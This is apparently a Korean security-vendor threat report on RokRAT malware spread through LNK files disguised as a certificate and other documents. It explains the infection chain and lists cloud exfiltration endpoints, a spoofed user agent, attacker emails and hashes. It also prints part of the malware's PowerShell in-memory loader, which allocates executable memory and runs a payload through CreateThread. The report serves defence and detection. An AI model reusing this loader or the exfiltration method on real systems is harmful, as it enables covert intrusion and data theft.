RokRAT 악성코드를 유포하는 LNK 파일 (수료증 위장)

AhnLab SEcurity intelligence Center(ASEC)은 백도어 유형의 악성코드를 유포하는 비정상적인 크기의 링크 파일(*.LNK)이 꾸준히 유포되고 있음을 확인하였다. 최근 확인된 링크 파일(*.LNK)은 국내 사용자, 특히 대북 관련 인사를 대상으로 유포하는 것으로 확인된다. 확인된 LNK 파일명은 다음과 같다.

• 국가정보 아카데미 8기 통합과정 수료증(최종본).lnk
• Gate access roster 2024.lnk
• 동북공정(미국의회조사국(CRS Report).lnk
• 설비목록.lnk

확인된 LNK 파일은 CMD를 통해 파워쉘을 실행하는 명령어가 삽입되어 있으며 지난해 게시한 ‘링크 파일(*.lnk)을 통해 유포되는 RokRAT 악성코드 : RedEyes(ScarCruft)’[1] 와 유사한 유형으로 확인된다. 해당 유형은 LNK 파일 내부에 정상 문서 파일과 스크립트 코드, 악성 PE 데이터를 포함하고 있는 것이 특징이다.

악성코드의 간략한 동작 과정은 다음과 같다.

 

LNK 파일 실행 시 파워쉘 명령어가 실행되어 정상 문서 파일을 생성 및 실행한다.

 

이후 %public% 폴더에 3개의 파일을 생성한다. 이때 생성되는 파일들의 이름과 기능은 다음과 같다.

파일명	LNK 파일 내 위치	기능
viewer.dat	0x2BC97 (size:0xD9402)	인코딩된 RokRAT 악성코드
search.dat	0x105099 (size:0x5AA)	viewer.dat 파일 실행
find.bat	0x105643 (size:0x139)	search.dat 파일 실행

표1. 생성되는 파일 목록

가장 먼저 실행되는 ‘find.bat’은 파워쉘을 통해 ‘search.dat’을 실행한다. ‘search.dat’은 ‘viewer.dat’ 파일을 읽어 fileless 형태로 실행한다.

$exePath=$env:public+'\'+'viewer.dat';
$exeFile = Get-Content -path $exePath -encoding byte;
[Net.ServicePointManager]::SecurityProtocol = [Enum]::ToObject([Net.SecurityProtocolType], 3072);
$k1123 = [System.Text.Encoding]::UTF8.GetString(34) + 'kernel32.dll' + [System.Text.Encoding]::UTF8.GetString(34);
<중략>
$byteCount = $exeFile.Length;
$buffer = $b::GlobalAlloc(0x0040, $byteCount + 0x100);
$old = 0;
$a90234sb::VirtualProtect($buffer, $byteCount + 0x100, 0x40, [ref]$old);
for($i = 0;$i -lt $byteCount;$i++) {
	[System.Runtime.InteropServices.Marshal]::WriteByte($buffer, $i, $exeFile[$i]);	};
$handle = $cake3sd23::CreateThread(0, 0, $buffer, 0, 0, 0);
$fried3sd23::WaitForSingleObject($handle, 500 * 1000);

최종적으로 실행된 ‘viewer.dat’의 데이터는 RokRAT 악성코드로 클라우드 API를 활용하여 사용자 정보를 수집하고 공격자의 명령에 따라 다양한 악성 행위를 수행할 수 있는 백도어 유형의 악성코드이다.

수집된 정보는 pcloud, yandex DropBox와 같은 클라우드 서비스를 사용하여 공격자의 클라우드 서버로 전송된다. 이때 요청 헤더의 UserAgent는 Googlebot으로 위장하였으며 사용되는 클라우드 URL은 다음 표와 같다.

• User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)

Cloud	URL
Pcloud(Down)	https://api.pcloud.com/getfilelink?path=%s&forcedownload=1&skipfilename=1
Pcloud(up)	https://api.pcloud.com/uploadfile?path=%s&filename=%s&nopartial=1
Yandex(Down)	https://cloud-api.yandex.net/v1/disk/resources/download?path=%s
Yandex(up)	https://cloud-api.yandex.net/v1/disk/resources/upload?path=%s&overwrite=%s
DropBox(Down)	https://content.dropboxapi.com/2/files/download
DropBox(up)	https://content.dropboxapi.com/2/files/upload

표 2. 사용되는 클라우드 URL 세부 정보

공격자의 명령에 따라 실행 가능한 악성 행위는 다음과 같다.

• 커맨드 명령 실행
• 디렉터리 목록 수집
• 시작프로그램 폴더 내 특정 파일(VBS, CMD, BAT, lnk 확장자) 삭제
• 시작프로그램 폴더 목록, %APPDATA% 폴더 목록, 최근 사용한 파일 목록 수집
• PC 정보 수집(시스템 정보, IP, 라우터 정보 등)

이 외에도 다양한 악성 행위가 수행될 수 있으며 수집된 정보는 %TEMP% 폴더에 저장 후 공격자의 클라우드 서버에 업로드 된다. 분석 과정에서 확인된 공격자의 이메일 주소는 다음과 같다.

• tanessha.samuel@gmail[.]com
• tianling0315@gmail[.]com
• w.sarah0808@gmail[.]com
• softpower21cs@gmail[.]com

ASEC에서는 자사 블로그를 통해 악성 바로 가기 파일에 대해 꾸준히 공유해 온 만큼 해당 악성코드의 유포가 빈번하게 확인되고 있다. 특히 통일, 군사, 교육 관련 종사자를 대상으로 하는 악성코드는 과거부터 꾸준히 확인되고 있어 각별한 주의가 필요하다.

 

[파일 진단]
Dropper/LNK.S2343 (2024.04.12.03)
Trojan/BAT.Runner (2024.04.12.00)
Trojan/Script.Generic (2024.04.12.00)
Data/BIN.EncPe (2024.04.12.00)
Infostealer/Win.Agent.R579429 (2023.05.05.01)

MD5

3114a3d092e269128f72cfd34812ddc8

35441efd293d9c9fb4788a3f0b4f2e6b

358122718ba11b3e8bb56340dbe94f51

68386fa9933b2dc5711dffcee0748115

6e5e5ec38454ecf94e723897a42450ea